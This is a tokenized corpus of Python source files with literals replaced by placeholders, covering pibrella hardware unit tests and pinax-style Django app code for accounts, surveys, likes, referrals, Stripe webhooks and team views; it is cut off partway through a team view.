<s> import os , sys <EOL> sys . path . insert ( <NUM_LIT:1> , os . path . join ( sys . path [ <NUM_LIT:0> ] , '<STR_LIT:..>' ) ) <EOL> import pibrella <EOL> if sys . version [ : <NUM_LIT:3> ] == '<STR_LIT>' : <EOL> import unittest2 as unittest <EOL> else : <EOL> import unittest <EOL> class TestAASanity ( unittest . TestCase ) : <EOL> def test_outputexists ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( isinstance ( pibrella . output . e , pibrella . Output ) , True ) <EOL> self . assertEqual ( isinstance ( pibrella . output . f , pibrella . Output ) , True ) <EOL> self . assertEqual ( isinstance ( pibrella . output . g , pibrella . Output ) , True ) <EOL> self . assertEqual ( isinstance ( pibrella . output . h , pibrella . Output ) , True ) <EOL> def test_output_index ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( pibrella . output . e , pibrella . output [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( pibrella . output . f , pibrella . output [ <NUM_LIT:1> ] ) <EOL> self . assertEqual ( pibrella . output . g , pibrella . output [ <NUM_LIT:2> ] ) <EOL> self . assertEqual ( pibrella . output . h , pibrella . output [ <NUM_LIT:3> ] ) <EOL> class TestBBInput ( unittest . TestCase ) : <EOL> def test_outputwrite ( self ) : <EOL> """<STR_LIT>""" <EOL> pibrella . output . e . write ( <NUM_LIT:1> ) <EOL> self . assertEqual ( pibrella . output . e . read ( ) , <NUM_LIT:1> ) <EOL> pibrella . output . f . write ( <NUM_LIT:1> ) <EOL> self . assertEqual ( pibrella . output . f . read ( ) , <NUM_LIT:1> ) <EOL> pibrella . output . g . write ( <NUM_LIT:1> ) <EOL> self . assertEqual ( pibrella . output . g . read ( ) , <NUM_LIT:1> ) <EOL> pibrella . output . h . write ( <NUM_LIT:1> ) <EOL> self . assertEqual ( pibrella . output . h . read ( ) , <NUM_LIT:1> ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> from . settings import get_config <EOL> from . exceptions import InvalidSettingsError </s>
<s> from django . contrib import admin <EOL> from flag . models import FlaggedContent , FlagInstance <EOL> class InlineFlagInstance ( admin . TabularInline ) : <EOL> model = FlagInstance <EOL> extra = <NUM_LIT:0> <EOL> class FlaggedContentAdmin ( admin . ModelAdmin ) : <EOL> inlines = [ InlineFlagInstance ] <EOL> admin . site . register ( FlaggedContent , FlaggedContentAdmin ) </s>
<s> from __future__ import unicode_literals <EOL> from account . conf import settings <EOL> from account . models import Account <EOL> def account ( request ) : <EOL> ctx = { <EOL> "<STR_LIT>" : Account . for_request ( request ) , <EOL> "<STR_LIT>" : settings . ACCOUNT_OPEN_SIGNUP , <EOL> } <EOL> return ctx </s>
<s> from django . contrib import admin <EOL> from . models import ( <EOL> Cohort , <EOL> SignupCodeCohort , <EOL> Survey , <EOL> SurveyAnswer , <EOL> SurveyInstance , <EOL> SurveyQuestion , <EOL> SurveyQuestionChoice , <EOL> UserCohort , <EOL> WaitingListEntry <EOL> ) <EOL> class WaitingListEntryAdmin ( admin . ModelAdmin ) : <EOL> list_display = [ "<STR_LIT:email>" , "<STR_LIT>" ] <EOL> search_fields = [ "<STR_LIT:email>" ] <EOL> class SignupCodeCohortInline ( admin . TabularInline ) : <EOL> model = SignupCodeCohort <EOL> class UserCohortInline ( admin . TabularInline ) : <EOL> model = UserCohort <EOL> class SurveyInstanceAdmin ( admin . ModelAdmin ) : <EOL> model = SurveyInstance <EOL> list_display = [ "<STR_LIT>" , "<STR_LIT:email>" , "<STR_LIT>" ] <EOL> def survey ( self , obj ) : <EOL> return obj . survey . label <EOL> def email ( self , obj ) : <EOL> return obj . entry . email <EOL> def created ( self , obj ) : <EOL> return obj . entry . created <EOL> class SurveyAnswerAdmin ( admin . ModelAdmin ) : <EOL> model = SurveyAnswer <EOL> list_display = [ "<STR_LIT>" , "<STR_LIT:email>" , "<STR_LIT>" , "<STR_LIT:value>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> def survey ( self , obj ) : <EOL> return obj . instance . survey . label <EOL> def email ( self , obj ) : <EOL> return obj . instance . entry . email <EOL> def question_label ( self , obj ) : <EOL> return obj . question . question <EOL> class SurveyQuestionChoiceInline ( admin . TabularInline ) : <EOL> model = SurveyQuestionChoice <EOL> class SurveyQuestionAdmin ( admin . ModelAdmin ) : <EOL> model = SurveyQuestion <EOL> list_display = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> inlines = [ SurveyQuestionChoiceInline ] <EOL> def survey ( self , obj ) : <EOL> return obj . survey . label <EOL> admin . site . register ( WaitingListEntry , WaitingListEntryAdmin ) <EOL> admin . site . register ( <EOL> Cohort , <EOL> inlines = [ <EOL> SignupCodeCohortInline , <EOL> UserCohortInline , <EOL> ] <EOL> ) <EOL> admin . site . register ( <EOL> Survey , <EOL> list_display = [ "<STR_LIT:label>" , "<STR_LIT>" ] <EOL> ) <EOL> admin . site . register ( SurveyAnswer , SurveyAnswerAdmin ) <EOL> admin . site . register ( SurveyInstance , SurveyInstanceAdmin ) <EOL> admin . site . register ( SurveyQuestion , SurveyQuestionAdmin ) </s>
<s> import django . dispatch <EOL> post_viewed = django . dispatch . Signal ( providing_args = [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> post_published = django . dispatch . Signal ( providing_args = [ "<STR_LIT>" ] ) <EOL> post_redirected = django . dispatch . Signal ( providing_args = [ "<STR_LIT>" , "<STR_LIT>" ] ) </s>
<s> import codecs <EOL> from os import path <EOL> from setuptools import find_packages , setup <EOL> def read ( * parts ) : <EOL> filename = path . join ( path . dirname ( __file__ ) , * parts ) <EOL> with codecs . open ( filename , encoding = "<STR_LIT:utf-8>" ) as fp : <EOL> return fp . read ( ) <EOL> setup ( <EOL> author = "<STR_LIT>" , <EOL> author_email = "<STR_LIT>" , <EOL> description = "<STR_LIT>" , <EOL> name = "<STR_LIT>" , <EOL> long_description = read ( "<STR_LIT>" ) , <EOL> version = "<STR_LIT>" , <EOL> url = "<STR_LIT>" , <EOL> license = "<STR_LIT>" , <EOL> install_requires = [ <EOL> "<STR_LIT>" , <EOL> ] , <EOL> packages = find_packages ( ) , <EOL> package_data = { <EOL> "<STR_LIT>" : [ ] <EOL> } , <EOL> test_suite = "<STR_LIT>" , <EOL> tests_require = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] , <EOL> classifiers = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] , <EOL> zip_safe = False <EOL> ) </s>
<s> from django . conf import settings <EOL> from appconf import AppConf <EOL> from collections import defaultdict <EOL> class PinaxLikesAppConf ( AppConf ) : <EOL> LIKABLE_MODELS = defaultdict ( dict ) <EOL> def configure_likable_models ( self , value ) : <EOL> DEFAULT_LIKE_CONFIG = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } <EOL> for model in value : <EOL> custom_data = value [ model ] . copy ( ) <EOL> default_data = DEFAULT_LIKE_CONFIG . copy ( ) <EOL> value [ model ] = default_data <EOL> value [ model ] . update ( custom_data ) <EOL> return value <EOL> class Meta : <EOL> prefix = "<STR_LIT>" </s>
<s> import random <EOL> def generate_code ( referral_class ) : <EOL> def _generate_code ( ) : <EOL> t = "<STR_LIT>" <EOL> return "<STR_LIT>" . join ( [ random . choice ( t ) for i in range ( <NUM_LIT> ) ] ) <EOL> code = _generate_code ( ) <EOL> while referral_class . objects . filter ( code = code ) . exists ( ) : <EOL> code = _generate_code ( ) <EOL> return code <EOL> def filter_responses ( user = None , referral = None ) : <EOL> from . models import ReferralResponse <EOL> responses = ReferralResponse . objects . all ( ) <EOL> if user : <EOL> responses = responses . filter ( referral__user = user ) <EOL> if referral : <EOL> responses = responses . filter ( referral = referral ) <EOL> return responses . order_by ( "<STR_LIT>" ) </s>
<s> import importlib <EOL> from django . conf import settings <EOL> from django . core . exceptions import ImproperlyConfigured <EOL> import stripe <EOL> from appconf import AppConf <EOL> def load_path_attr ( path ) : <EOL> i = path . rfind ( "<STR_LIT:.>" ) <EOL> module , attr = path [ : i ] , path [ i + <NUM_LIT:1> : ] <EOL> try : <EOL> mod = importlib . import_module ( module ) <EOL> except ImportError as e : <EOL> raise ImproperlyConfigured ( <EOL> "<STR_LIT>" . format ( module , e ) <EOL> ) <EOL> try : <EOL> attr = getattr ( mod , attr ) <EOL> except AttributeError : <EOL> raise ImproperlyConfigured ( <EOL> "<STR_LIT>" . format ( module , attr ) <EOL> ) <EOL> return attr <EOL> class PinaxStripeAppConf ( AppConf ) : <EOL> PUBLIC_KEY = None <EOL> SECRET_KEY = None <EOL> API_VERSION = "<STR_LIT>" <EOL> INVOICE_FROM_EMAIL = "<STR_LIT>" <EOL> DEFAULT_PLAN = None <EOL> HOOKSET = "<STR_LIT>" <EOL> SEND_EMAIL_RECEIPTS = True <EOL> SUBSCRIPTION_REQUIRED_EXCEPTION_URLS = [ ] <EOL> SUBSCRIPTION_REQUIRED_REDIRECT = None <EOL> class Meta : <EOL> prefix = "<STR_LIT>" <EOL> required = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> def configure_api_version ( self , value ) : <EOL> stripe . api_version = value <EOL> return value <EOL> def configure_secret_key ( self , value ) : <EOL> stripe . api_key = value <EOL> return value <EOL> def configure_hookset ( self , value ) : <EOL> return load_path_attr ( value ) ( ) </s>
<s> import decimal <EOL> import json <EOL> import six <EOL> from django . core . urlresolvers import reverse <EOL> from django . dispatch import Signal <EOL> from django . test import TestCase <EOL> from django . test . client import Client <EOL> import stripe <EOL> from mock import patch <EOL> from . import TRANSFER_CREATED_TEST_DATA , TRANSFER_PENDING_TEST_DATA <EOL> from . . models import Event , Transfer , EventProcessingException , Customer <EOL> from . . webhooks import registry , AccountUpdatedWebhook , ChargeCapturedWebhook , CustomerUpdatedWebhook , CustomerSourceCreatedWebhook , CustomerSourceDeletedWebhook , CustomerSubscriptionCreatedWebhook , InvoiceCreatedWebhook <EOL> class WebhookRegistryTest ( TestCase ) : <EOL> def test_get_signal ( self ) : <EOL> signal = registry . get_signal ( "<STR_LIT>" ) <EOL> self . assertTrue ( isinstance ( signal , Signal ) ) <EOL> def test_get_signal_keyerror ( self ) : <EOL> self . assertIsNone ( registry . get_signal ( "<STR_LIT>" ) ) <EOL> class WebhookTests ( TestCase ) : <EOL> @ patch ( "<STR_LIT>" ) <EOL> def test_webhook_with_transfer_event ( self , StripeEventMock ) : <EOL> data = { <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT:data>" : { <EOL> "<STR_LIT:object>" : { <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:date>" : <NUM_LIT> , <EOL> "<STR_LIT:description>" : None , <EOL> "<STR_LIT:id>" : "<STR_LIT>" , <EOL> "<STR_LIT:object>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ ] , <EOL> "<STR_LIT:status>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : <NUM_LIT:0> , <EOL> "<STR_LIT>" : [ ] , <EOL> "<STR_LIT>" : <NUM_LIT:0> , <EOL> "<STR_LIT>" : <NUM_LIT:0> , <EOL> "<STR_LIT>" : <NUM_LIT:1> , <EOL> "<STR_LIT>" : [ { <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:description>" : None , <EOL> "<STR_LIT:type>" : "<STR_LIT>" <EOL> } ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT:0> , <EOL> "<STR_LIT>" : <NUM_LIT:0> , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT:0> , <EOL> "<STR_LIT>" : <NUM_LIT:0> , <EOL> "<STR_LIT>" : <NUM_LIT:0> , <EOL> "<STR_LIT>" : <NUM_LIT:0> , <EOL> "<STR_LIT>" : <NUM_LIT:0> <EOL> } <EOL> } <EOL> } , <EOL> "<STR_LIT:id>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT:object>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : <NUM_LIT:1> , <EOL> "<STR_LIT:type>" : "<STR_LIT>" <EOL> } <EOL> StripeEventMock . return_value . to_dict . return_value = data <EOL> msg = json . dumps ( data ) <EOL> resp = Client ( ) . post ( <EOL> reverse ( "<STR_LIT>" ) , <EOL> six . u ( msg ) , <EOL> content_type = "<STR_LIT:application/json>" <EOL> ) <EOL> self . assertEquals ( resp . status_code , <NUM_LIT:200> ) <EOL> self . assertTrue ( Event . objects . filter ( kind = "<STR_LIT>" ) . exists ( ) ) <EOL> def test_webhook_duplicate_event ( self ) : <EOL> data = { "<STR_LIT:id>" : <NUM_LIT> } <EOL> Event . objects . create ( stripe_id = <NUM_LIT> , livemode = True ) <EOL> msg = json . dumps ( data ) <EOL> resp = Client ( ) . post ( <EOL> reverse ( "<STR_LIT>" ) , <EOL> six . u ( msg ) , <EOL> content_type = "<STR_LIT:application/json>" <EOL> ) <EOL> self . assertEquals ( resp . status_code , <NUM_LIT:200> ) <EOL> self . assertTrue ( EventProcessingException . objects . filter ( message = "<STR_LIT>" ) . exists ( ) ) <EOL> def test_webhook_event_mismatch ( self ) : <EOL> event = Event ( kind = "<STR_LIT>" ) <EOL> WH = registry . get ( "<STR_LIT>" ) <EOL> with self . assertRaises ( Exception ) : <EOL> WH ( event ) <EOL> @ patch ( "<STR_LIT>" ) <EOL> def test_send_signal ( self , SignalSendMock ) : <EOL> event = Event ( kind = "<STR_LIT>" ) <EOL> WH = registry . get ( "<STR_LIT>" ) <EOL> WH ( event ) . send_signal ( ) <EOL> self . assertTrue ( SignalSendMock . called ) <EOL> def test_send_signal_not_sent ( self ) : <EOL> event = Event ( kind = "<STR_LIT>" ) <EOL> WH = registry . get ( "<STR_LIT>" ) <EOL> def signal_handler ( sender , * args , ** kwargs ) : <EOL> self . fail ( "<STR_LIT>" ) <EOL> registry . get_signal ( "<STR_LIT>" ) . connect ( signal_handler ) <EOL> webhook = WH ( event ) <EOL> webhook . name = "<STR_LIT>" <EOL> webhook . send_signal ( ) <EOL> @ patch ( "<STR_LIT>" ) <EOL> @ patch ( "<STR_LIT>" ) <EOL> @ patch ( "<STR_LIT>" ) <EOL> def test_process_exception_is_logged ( self , ProcessWebhookMock , ValidateMock , LinkMock ) : <EOL> event = Event . objects . create ( kind = "<STR_LIT>" , webhook_message = { } , valid = True , processed = False ) <EOL> ProcessWebhookMock . side_effect = stripe . StripeError ( "<STR_LIT>" , "<STR_LIT:error>" ) <EOL> AccountUpdatedWebhook ( event ) . process ( ) <EOL> self . assertTrue ( EventProcessingException . objects . filter ( event = event ) . exists ( ) ) <EOL> @ patch ( "<STR_LIT>" ) <EOL> @ patch ( "<STR_LIT>" ) <EOL> def test_process_return_none ( self , ValidateMock , LinkMock ) : <EOL> event = Event . objects . create ( kind = "<STR_LIT>" , webhook_message = { } , valid = True , processed = False ) <EOL> self . assertIsNone ( AccountUpdatedWebhook ( event ) . process ( ) ) <EOL> class ChargeWebhookTest ( TestCase ) : <EOL> @ patch ( "<STR_LIT>" ) <EOL> @ patch ( "<STR_LIT>" ) <EOL> def test_process_webhook ( self , SyncMock , RetrieveMock ) : <EOL> event = Event . objects . create ( kind = ChargeCapturedWebhook . name , webhook_message = { } , valid = True , processed = False ) <EOL> event . validated_message = dict ( data = dict ( object = dict ( id = <NUM_LIT:1> ) ) ) <EOL> ChargeCapturedWebhook ( event ) . process_webhook ( ) <EOL> self . assertTrue ( SyncMock . called ) <EOL> class CustomerUpdatedWebhookTest ( TestCase ) : <EOL> @ patch ( "<STR_LIT>" ) <EOL> def test_process_webhook ( self , SyncMock ) : <EOL> event = Event . objects . create ( kind = CustomerUpdatedWebhook . name , webhook_message = { } , valid = True , processed = False ) <EOL> CustomerUpdatedWebhook ( event ) . process_webhook ( ) <EOL> self . assertTrue ( SyncMock . called ) <EOL> class CustomerSourceCreatedWebhookTest ( TestCase ) : <EOL> @ patch ( "<STR_LIT>" ) <EOL> def test_process_webhook ( self , SyncMock ) : <EOL> event = Event . objects . create ( kind = CustomerSourceCreatedWebhook . name , webhook_message = { } , valid = True , processed = False ) <EOL> event . validated_message = dict ( data = dict ( object = dict ( ) ) ) <EOL> CustomerSourceCreatedWebhook ( event ) . process_webhook ( ) <EOL> self . assertTrue ( SyncMock . called ) <EOL> class CustomerSourceDeletedWebhookTest ( TestCase ) : <EOL> @ patch ( "<STR_LIT>" ) <EOL> def test_process_webhook ( self , SyncMock ) : <EOL> event = Event . objects . create ( kind = CustomerSourceDeletedWebhook . name , webhook_message = { } , valid = True , processed = False ) <EOL> event . validated_message = dict ( data = dict ( object = dict ( id = <NUM_LIT:1> ) ) ) <EOL> CustomerSourceDeletedWebhook ( event ) . process_webhook ( ) <EOL> self . assertTrue ( SyncMock . called ) <EOL> class CustomerSubscriptionCreatedWebhookTest ( TestCase ) : <EOL> @ patch ( "<STR_LIT>" ) <EOL> @ patch ( "<STR_LIT>" ) <EOL> def test_process_webhook ( self , SyncMock , RetrieveMock ) : <EOL> event = Event . objects . create ( kind = CustomerSubscriptionCreatedWebhook . name , customer = Customer . objects . create ( ) , webhook_message = { } , valid = True , processed = False ) <EOL> CustomerSubscriptionCreatedWebhook ( event ) . process_webhook ( ) <EOL> self . assertTrue ( SyncMock . called ) <EOL> @ patch ( "<STR_LIT>" ) <EOL> def test_process_webhook_no_customer ( self , SyncMock ) : <EOL> event = Event . objects . create ( kind = CustomerSubscriptionCreatedWebhook . name , webhook_message = { } , valid = True , processed = False ) <EOL> CustomerSubscriptionCreatedWebhook ( event ) . process_webhook ( ) <EOL> self . assertFalse ( SyncMock . called ) <EOL> class InvoiceCreatedWebhookTest ( TestCase ) : <EOL> @ patch ( "<STR_LIT>" ) <EOL> def test_process_webhook ( self , SyncMock ) : <EOL> event = Event . objects . create ( kind = InvoiceCreatedWebhook . name , webhook_message = { } , valid = True , processed = False ) <EOL> event . validated_message = dict ( data = dict ( object = dict ( id = <NUM_LIT:1> ) ) ) <EOL> InvoiceCreatedWebhook ( event ) . process_webhook ( ) <EOL> self . assertTrue ( SyncMock . called ) <EOL> class TestTransferWebhooks ( TestCase ) : <EOL> @ patch ( "<STR_LIT>" ) <EOL> def test_transfer_created ( self , EventMock ) : <EOL> ev = EventMock ( ) <EOL> ev . to_dict . return_value = TRANSFER_CREATED_TEST_DATA <EOL> event = Event . objects . create ( <EOL> stripe_id = TRANSFER_CREATED_TEST_DATA [ "<STR_LIT:id>" ] , <EOL> kind = "<STR_LIT>" , <EOL> livemode = True , <EOL> webhook_message = TRANSFER_CREATED_TEST_DATA , <EOL> validated_message = TRANSFER_CREATED_TEST_DATA , <EOL> valid = True <EOL> ) <EOL> registry . get ( event . kind ) ( event ) . process ( ) <EOL> transfer = Transfer . objects . get ( stripe_id = "<STR_LIT>" ) <EOL> self . assertEquals ( transfer . amount , decimal . Decimal ( "<STR_LIT>" ) ) <EOL> self . assertEquals ( transfer . status , "<STR_LIT>" ) <EOL> @ patch ( "<STR_LIT>" ) <EOL> def test_transfer_pending_create ( self , EventMock ) : <EOL> ev = EventMock ( ) <EOL> ev . to_dict . return_value = TRANSFER_PENDING_TEST_DATA <EOL> event = Event . objects . create ( <EOL> stripe_id = TRANSFER_PENDING_TEST_DATA [ "<STR_LIT:id>" ] , <EOL> kind = "<STR_LIT>" , <EOL> livemode = True , <EOL> webhook_message = TRANSFER_PENDING_TEST_DATA , <EOL> validated_message = TRANSFER_PENDING_TEST_DATA , <EOL> valid = True <EOL> ) <EOL> registry . get ( event . kind ) ( event ) . process ( ) <EOL> transfer = Transfer . objects . get ( stripe_id = "<STR_LIT>" ) <EOL> self . assertEquals ( transfer . amount , decimal . Decimal ( "<STR_LIT>" ) ) <EOL> self . assertEquals ( transfer . status , "<STR_LIT>" ) <EOL> @ patch ( "<STR_LIT>" ) <EOL> def test_transfer_paid_updates_existing_record ( self , EventMock ) : <EOL> ev = EventMock ( ) <EOL> ev . to_dict . return_value = TRANSFER_CREATED_TEST_DATA <EOL> event = Event . objects . create ( <EOL> stripe_id = TRANSFER_CREATED_TEST_DATA [ "<STR_LIT:id>" ] , <EOL> kind = "<STR_LIT>" , <EOL> livemode = True , <EOL> webhook_message = TRANSFER_CREATED_TEST_DATA , <EOL> validated_message = TRANSFER_CREATED_TEST_DATA , <EOL> valid = True <EOL> ) <EOL> registry . get ( event . kind ) ( event ) . process ( ) <EOL> data = { <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT:data>" : { <EOL> "<STR_LIT:object>" : { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:object>" : "<STR_LIT>" <EOL> } , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:date>" : <NUM_LIT> , <EOL> "<STR_LIT:description>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : <NUM_LIT:0> , <EOL> "<STR_LIT>" : [ ] , <EOL> "<STR_LIT:id>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT:object>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ ] , <EOL> "<STR_LIT:status>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : <NUM_LIT:0> , <EOL> "<STR_LIT>" : [ ] , <EOL> "<STR_LIT>" : <NUM_LIT:0> , <EOL> "<STR_LIT>" : <NUM_LIT:0> , <EOL> "<STR_LIT>" : <NUM_LIT:1> , <EOL> "<STR_LIT>" : [ { <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:description>" : None , <EOL> "<STR_LIT:type>" : "<STR_LIT>" <EOL> } ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT:0> , <EOL> "<STR_LIT>" : <NUM_LIT:0> , <EOL> "<STR_LIT>" : <NUM_LIT:0> , <EOL> "<STR_LIT>" : <NUM_LIT:0> , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT:0> , <EOL> "<STR_LIT>" : [ ] , <EOL> "<STR_LIT>" : <NUM_LIT:0> , <EOL> "<STR_LIT>" : <NUM_LIT:0> , <EOL> "<STR_LIT>" : <NUM_LIT:0> , <EOL> "<STR_LIT>" : <NUM_LIT:0> <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT:count>" : <NUM_LIT:1> , <EOL> "<STR_LIT:data>" : [ { <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT:description>" : None , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : [ { <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:description>" : "<STR_LIT>" , <EOL> "<STR_LIT:type>" : "<STR_LIT>" <EOL> } ] , <EOL> "<STR_LIT:id>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT:type>" : "<STR_LIT>" <EOL> } ] , <EOL> "<STR_LIT:object>" : "<STR_LIT:list>" , <EOL> "<STR_LIT:url>" : "<STR_LIT>" <EOL> } <EOL> } <EOL> } , <EOL> "<STR_LIT:id>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT:object>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : <NUM_LIT:1> , <EOL> "<STR_LIT:type>" : "<STR_LIT>" <EOL> } <EOL> paid_event = Event . objects . create ( <EOL> stripe_id = data [ "<STR_LIT:id>" ] , <EOL> kind = "<STR_LIT>" , <EOL> livemode = True , <EOL> webhook_message = data , <EOL> validated_message = data , <EOL> valid = True <EOL> ) <EOL> registry . get ( paid_event . kind ) ( paid_event ) . process ( ) <EOL> transfer = Transfer . objects . get ( stripe_id = "<STR_LIT>" ) <EOL> self . assertEquals ( transfer . status , "<STR_LIT>" ) </s>
<s> import json <EOL> from django . http import Http404 , HttpResponse , HttpResponseRedirect , HttpResponseForbidden , JsonResponse <EOL> from django . shortcuts import render , redirect , get_object_or_404 <EOL> from django . template import RequestContext <EOL> from django . template . loader import render_to_string <EOL> from django . utils . decorators import method_decorator <EOL> from django . views . decorators . http import require_POST <EOL> from django . views . generic . edit import CreateView <EOL> from django . views . generic import ListView , FormView , TemplateView <EOL> from django . contrib import messages <EOL> from django . contrib . auth import get_user_model <EOL> from account . decorators import login_required <EOL> from account . mixins import LoginRequiredMixin <EOL> from account . views import SignupView <EOL> from six import string_types <EOL> from . decorators import team_required , manager_required <EOL> from . forms import TeamInviteUserForm , TeamForm , TeamSignupForm <EOL> from . hooks import hookset <EOL> from . models import Team , Membership <EOL> MESSAGE_STRINGS = hookset . get_message_strings ( ) <EOL> class TeamSignupView ( SignupView ) : <EOL> template_name = "<STR_LIT>" <EOL> def get_form_class ( self ) : <EOL> if self . signup_code : <EOL> return self . form_class <EOL> return TeamSignupForm <EOL> def after_signup ( self , form ) : <EOL> if not self . signup_code : <EOL> self . created_user . teams_created . create ( <EOL> name = form . cleaned_data [ "<STR_LIT>" ] <EOL> ) <EOL> super ( TeamSignupView , self ) . after_signup ( form ) <EOL> class TeamCreateView ( LoginRequiredMixin , CreateView ) : <EOL> form_class = TeamForm <EOL> model = Team <EOL> def form_valid ( self , form ) : <EOL> self . object = form . save ( commit = False ) <EOL> self . object . creator = self . request . user <EOL> self . object . save ( ) <EOL> return HttpResponseRedirect ( self . get_success_url ( ) ) <EOL> class TeamListView ( ListView ) : <EOL> model = Team <EOL> context_object_name = "<STR_LIT>" <EOL> @ team_required <EOL> @ login_required <EOL> def team_update ( request ) : <EOL> team = request . team <EOL> if not team . is_owner_or_manager ( request . user ) : <EOL> return HttpResponseForbidden ( ) <EOL> if request . method == "<STR_LIT:POST>" : <EOL> form = TeamForm ( request . POST , instance = team ) <EOL> if form . is_valid ( ) : <EOL> form . save ( ) <EOL> return redirect ( team . get_absolute_url ( ) ) <EOL> else : <EOL> form = TeamForm ( instance = team ) <EOL> return render ( request , "<STR_LIT>" , { "<STR_LIT>" : form , "<STR_LIT>" : team } ) <EOL> @ team_required <EOL> @ login_required <EOL> def team_detail ( request ) : <EOL> team = request . team <EOL> state = team . state_for ( request . user ) <EOL> role = team . role_for ( request . user ) <EOL> if team . member_access == Team . MEMBER_ACCESS_INVITATION and state is None : <EOL> raise Http404 ( ) <EOL> return render ( request , "<STR_LIT>" , { <EOL> "<STR_LIT>" : team , <EOL> "<STR_LIT:state>" : state , <EOL> "<STR_LIT>" : role , <EOL> "<STR_LIT>" : TeamInviteUserForm ( team = team ) , <EOL> "<STR_LIT>" : team . can_join ( request . user ) , <EOL> "<STR_LIT>" : team . can_leave ( request . user ) , <EOL> "<STR_LIT>" : team . can_apply ( request . user ) , <EOL> } ) <EOL> class TeamManageView ( TemplateView ) : <EOL> template_name = "<STR_LIT>" <EOL> @ method_decorator ( manager_required ) <EOL> def dispatch ( self , * args , ** kwargs ) : <EOL> self . team = self . request . team <EOL> self . role = self . team . role_for ( self . request . user ) <EOL> return super ( TeamManageView , self ) . dispatch ( * args , ** kwargs ) <EOL> def get_context_data ( self , ** kwargs ) : <EOL> ctx = super ( TeamManageView , self ) . get_context_data ( ** kwargs ) <EOL> ctx . update ( { <EOL> "<STR_LIT>" : self . team , <EOL> "<STR_LIT>" : self . role , <EOL> "<STR_LIT>" : self . get_team_invite_form ( ) , <EOL> "<STR_LIT>" : self . team . can_join ( self . request . user ) , <EOL> "<STR_LIT>" : self . team . can_leave ( self . request . user ) , <EOL> "<STR_LIT>" : self . team . can_apply ( self . request . user ) , <EOL> } ) <EOL> return ctx <EOL> def get_team_invite_form ( self ) : <EOL> return TeamInviteUserForm ( team = self . team ) <EOL> @ team_required <EOL> @ login_required <EOL> def team_join ( request ) : <EOL> team = request . team <EOL> state = team . state_for ( request . user ) <EOL> if team . manager_access == Team . MEMBER_ACCESS_INVITATION and state is None and not request . user . is_staff : <EOL> raise Http404 ( ) <EOL> if team . can_join ( request . user ) and request . method == "<STR_LIT:POST>" : <EOL> membership , created = Membership . objects . get_or_create ( team = team , user = request . user ) <EOL> membership . role = Membership . ROLE_MEMBER <EOL> membership . state = Membership . STATE_AUTO_JOINED <EOL> membership . save ( ) <EOL> messages . success ( request , MESSAGE_STRINGS [ 